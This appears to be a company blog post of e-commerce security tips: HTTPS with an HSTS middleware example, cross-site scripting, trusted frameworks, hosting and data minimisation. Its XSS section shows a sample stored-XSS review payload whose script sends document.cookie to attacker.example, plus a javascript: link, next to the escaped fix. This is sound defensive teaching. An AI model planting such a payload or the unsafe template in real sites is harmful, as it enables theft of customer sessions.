Securing an e-commerce site is a multifaceted problem that affects developers, business owners and consumers. Luckily, there are some basic best practices that every e-commerce site can apply to dramatically improve its overall security.
Security isn’t something you can relegate to the back burner. Poor security leads to lost sales, downtime and serious liability if customer data is stolen. Some ignore security under the premise that ‘it won’t happen to me’, but e-commerce sites, both big and small, are routinely targeted because they handle payment data and are reachable by anyone on the internet.
If customers have even the tiniest inkling that security isn’t up to snuff at an e-commerce site, they’re unlikely to complete a purchase if entering their payment information is required. Once a company has lost customer trust due to a data breach, getting it back can be a long, uphill battle.
- Get basic web security right with HTTPS
It’s 2018. Every site on the internet really needs to use HTTPS. Consumers are increasingly aware of this and check their browser’s address bar to make sure a site is secured before they type in a card number.
Every page of an e-commerce site needs to be served over HTTPS, not just the login and payment pages as is often erroneously claimed: a session cookie issued after login is sent with every subsequent request, so a single plain-HTTP page is enough for an attacker on the network to steal it. TLS belongs everywhere on the site, and Google also pushes ‘HTTPS Everywhere’ by ranking and labelling sites accordingly. So obtain a certificate as early as possible, redirect every HTTP request to HTTPS, enable HSTS so browsers stop trying plain HTTP at all, and secure every bit of traffic on your site.
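As an added example (not code from the original post, nor from eTeam, Rails or Solidus), here is a minimal Rack-style middleware that enforces HTTPS on every request and sets an HSTS header. Rails gives you the same behaviour with `config.force_ssl = true`; spelling it out shows the one detail that routinely breaks in production. The assumption here, which is not stated on the page, is that the app runs behind a load balancer that terminates TLS (an AWS ALB, for instance) and reports the client’s original scheme in `X-Forwarded-Proto`; without that check every request looks like plain HTTP to the app and the redirect loops forever. The `ForceHttps` class, the `request` helper and the `shop.example` host are all constructed for the example.

```ruby
# Added example, not from the original page: enforce HTTPS on every request.
# Runs with Ruby's standard library only; no Rack gem is needed because Rack
# middleware is just an object with #call(env) that returns [status, headers, body].

class ForceHttps
  # One year, covering subdomains, so a browser never retries plain HTTP.
  HSTS = 'max-age=31536000; includeSubDomains'

  def initialize(app)
    @app = app
  end

  def call(env)
    return redirect_to_https(env) unless https?(env)

    status, headers, body = @app.call(env)
    # HSTS is only meaningful on HTTPS responses; browsers ignore it over HTTP.
    headers['Strict-Transport-Security'] ||= HSTS
    [status, headers, body]
  end

  private

  # Assumption: the load balancer terminates TLS, sets X-Forwarded-Proto and
  # strips any client-supplied copy. Trusting the header without that guarantee
  # would let a client spoof "https" and skip the redirect.
  def https?(env)
    forwarded = env['HTTP_X_FORWARDED_PROTO'].to_s.split(',').first.to_s.strip
    scheme = forwarded.empty? ? env['rack.url_scheme'] : forwarded
    scheme == 'https'
  end

  def redirect_to_https(env)
    location = "https://#{env['HTTP_HOST']}#{env['PATH_INFO']}"
    location += "?#{env['QUERY_STRING']}" unless env['QUERY_STRING'].to_s.empty?
    # 301 for GET/HEAD; 307 keeps the method and body for POST so a form is not
    # silently turned into a GET (the data already went over plain HTTP once,
    # which is exactly why HSTS matters for the next visit).
    status = %w[GET HEAD].include?(env['REQUEST_METHOD']) ? 301 : 307
    [status, { 'Location' => location, 'Content-Type' => 'text/plain' }, []]
  end
end

# Constructed downstream app: a catalogue page that just returns HTML.
PRODUCT_PAGE = ->(_env) { [200, { 'Content-Type' => 'text/html' }, ['<h1>Catalogue</h1>']] }
APP = ForceHttps.new(PRODUCT_PAGE)

# Constructed request builder producing the env hash a server would hand to Rack.
def request(scheme:, forwarded: nil, path: '/products/42', query: '', method: 'GET')
  env = { 'rack.url_scheme' => scheme, 'HTTP_HOST' => 'shop.example',
          'PATH_INFO' => path, 'QUERY_STRING' => query, 'REQUEST_METHOD' => method }
  env['HTTP_X_FORWARDED_PROTO'] = forwarded if forwarded
  APP.call(env)
end

if __FILE__ == $PROGRAM_NAME
  p request(scheme: 'http')                      # 301 to https://shop.example/products/42
  p request(scheme: 'http', forwarded: 'https')  # 200 with HSTS header: TLS ended at the LB
  p request(scheme: 'http', method: 'POST')      # 307, method preserved
end
```

The case that matters operationally is the second one: the app sees `rack.url_scheme` of `http` because the load balancer already decrypted the connection, and only the forwarded header tells it the user is in fact on HTTPS.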
- Cross-site scripting is one of the most common vulnerabilities
If you find and fix the cross-site scripting (XSS) flaws in your store, you’ve dealt with one of the most common attacks across the web. XSS lets an attacker’s script run in other visitors’ browsers under your site’s origin, typically because user-supplied text (a review, a search term, a profile name) is written into a page without being encoded. That script can then read session cookies, submit orders on the victim’s behalf or swap the checkout form for one that sends card numbers to the attacker.
This type of vulnerability is comparatively easy to test for: reflected XSS in particular is well covered by automated scanners, while stored and DOM-based variants still benefit from manual review of every place user input is rendered. All of our projects at eTeam are scanned with Sapience, an API security scanner that detects not only cross-site scripting but all of the top ten API vulnerabilities. We highly recommend that every single e-commerce store be scanned and tested for vulnerabilities.
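Here is an added example (not from the original post and not Sapience’s or eTeam’s code) of the stored-XSS pattern that scanners look for on a product review page, first as the unsafe template and then with context-aware output encoding. It uses only Ruby’s standard library; the attacker’s review text and link are constructed, and `render_review_unsafe`, `render_review_safe` and `safe_href` are hypothetical helper names.

```ruby
# Added example, not from the original page: a stored XSS in a review listing,
# and the same listing with output encoding applied per context.

require 'erb'
require 'uri'

# Constructed attacker input: a review body carrying a script that exfiltrates
# the session cookie, and a "homepage" link using the javascript: scheme.
EVIL_REVIEW = %q{Great shoes!<script>fetch('https://attacker.example/?c='+document.cookie)</script>}
EVIL_LINK   = 'javascript:alert(document.cookie)'

# Vulnerable: values are interpolated verbatim, so the script becomes part of
# the page and runs for every visitor under the shop's origin.
def render_review_unsafe(author, body, link)
  "<li><a href=\"#{link}\">#{author}</a>: #{body}</li>"
end

# URL context needs more than entity encoding: html_escape leaves
# "javascript:alert(1)" untouched, and it still executes when clicked.
# Allow only http(s) and fall back to a harmless anchor otherwise.
def safe_href(link)
  uri = URI.parse(link.to_s)
  return '#' unless %w[http https].include?(uri.scheme)
  ERB::Util.html_escape(uri.to_s)
rescue URI::InvalidURIError
  '#'
end

# Hardened: text and attribute values go through html_escape, which turns
# < > & " ' into entities so the browser treats them as data, not markup.
def render_review_safe(author, body, link)
  "<li><a href=\"#{safe_href(link)}\">#{ERB::Util.html_escape(author)}</a>: " \
    "#{ERB::Util.html_escape(body)}</li>"
end

# The check a scanner effectively performs: did a raw script tag or a
# javascript: href survive into the rendered HTML?
def script_in?(html)
  html.include?('<script') || html.downcase.include?('href="javascript:')
end

if __FILE__ == $PROGRAM_NAME
  puts render_review_unsafe('mallory', EVIL_REVIEW, EVIL_LINK)  # payload intact
  puts render_review_safe('mallory', EVIL_REVIEW, EVIL_LINK)    # payload neutralised
end
```

Rails’ ERB templates escape `<%= %>` output by default, so the unsafe version usually appears in real code as `raw`, `html_safe` or string concatenation in a helper; the `href` allowlist is the part the default escaping does not cover.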
- Use trusted frameworks
There’s a good reason security experts repeat the mantra of not rolling your own crypto, and it applies just as much to authentication and payments: it’s far too easy to make a critical mistake if you build the entire security apparatus for your e-commerce site from scratch. There’s absolutely no reason to do this. We have more good frameworks than ever with tried and true ways to handle security. Everything from password hashing and session management to payment handling has already been hashed out by some of the leading minds in the industry. Don’t reinvent the wheel, and do keep the framework you choose patched, since a known vulnerability in an unpatched platform is exactly what automated attacks look for.
If you’re wondering what framework is best for your e-commerce site, have a look at our guide to choosing between Magento, Spree and Solidus. The short version is that Ruby on Rails provides some great security features that make Solidus the logical starting point for new sites.
- Good hosting providers add security
Many newer e-commerce sites try to cut corners by relying on dodgy hosting providers. What may seem like small savings today could end up costing you big down the road. In our experience AWS is the best option for e-commerce for a number of reasons. Usually we recommend AWS because of autoscaling, load balancing and smoothly handling seasonal spikes, but we can also turn to AWS for security features.
> A stateless web application that relies on HTTPS for communication, such as a website, web-based API, or mobile application. (Source)
Returning to our first point, AWS makes it simple to issue certificates through AWS Certificate Manager and implement HTTPS everywhere. AWS Shield is one of the best defenses against crippling DDoS attacks that could render a site inoperable: Shield Standard is enabled automatically and covers network-layer floods, while the paid Shield Advanced tier and AWS WAF are what you add for application-layer attacks against the checkout itself. It’s worth hiring an AWS certified partner from the very start to make sure you optimize both the costs and the security settings for your e-commerce store.
- Only store what you need
Logically enough, if you don’t have something, it can’t be stolen. Another easy way to enhance your security is to make sure that any customer information you keep is actually necessary, and to delete what is not.
Storing payment information yourself exposes you to significant risk and pulls your whole platform into PCI DSS scope, so if you can find ways around storing it, take them. For instance, paying via Google Pay, Apple Pay, Stripe or PayPal is instantaneous and keeps card numbers off your servers entirely: the payment provider hands you a token to charge, which is useless to a thief who steals your database. This transfers much of the security risk away from smaller e-commerce sites while keeping the convenience of not having to enter payment information on each purchase.
Security isn’t an afterthought
While these five tips are quick ways to bolster the security of your e-commerce shop, they’re no reason to lower your guard. It’s important to stay up-to-date on evolving security threats and make sure your site is ready to deal with them.
At eTeam we’ve been developing for retail and e-commerce since 2009 and are ready to help you launch your e-commerce site or maintain an existing one. Let’s get in touch if you have any questions about e-commerce security.